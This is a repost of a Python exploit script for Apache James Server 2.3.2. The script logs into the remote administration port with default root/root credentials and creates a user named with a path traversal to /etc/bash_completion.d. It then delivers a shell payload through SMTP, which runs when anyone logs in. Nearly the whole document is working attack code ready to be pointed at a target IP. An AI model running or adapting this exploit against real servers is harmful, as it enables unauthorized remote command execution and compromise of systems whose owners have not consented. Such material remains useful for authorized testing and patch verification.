本文共 2306 字,大约阅读时间需要 7 分钟。
#!/usr/bin/python## Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution# Date: 16\10\2014# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec# Vendor Homepage: http://james.apache.org/server/# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip# Version: Apache James Server 2.3.2# Tested on: Ubuntu, Debian# Info: This exploit works on default installation of Apache James Server 2.3.2# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d import socketimport sysimport time # specify payload#payload = 'touch /tmp/proof.txt' # to exploit on any user payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root# credentials to James Remote Administration Tool (Default - root/root)user = 'root'pwd = 'root' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s\n" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to James Remote Administration Tool..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + "\n") s.recv(1024) s.send(pwd + "\n") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n") s.recv(1024) s.send("quit\n") s.close() print "[+]Connecting to James SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25)) s.send("ehlo team@team.pl\r\n") recv(s) print "[+]Sending payload..." s.send("mail from: <'@team.pl>\r\n") recv(s) # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n") recv(s) s.send("data\r\n") recv(s) s.send("From: team@team.pl\r\n") s.send("\r\n") s.send("'\n") s.send(payload + "\n") s.send("\r\n.\r\n") recv(s) s.send("quit\r\n") recv(s) s.close() print "[+]Done! Payload will be executed once somebody logs in."except: print "Connection failed."
转载地址:http://yommb.baihongyu.com/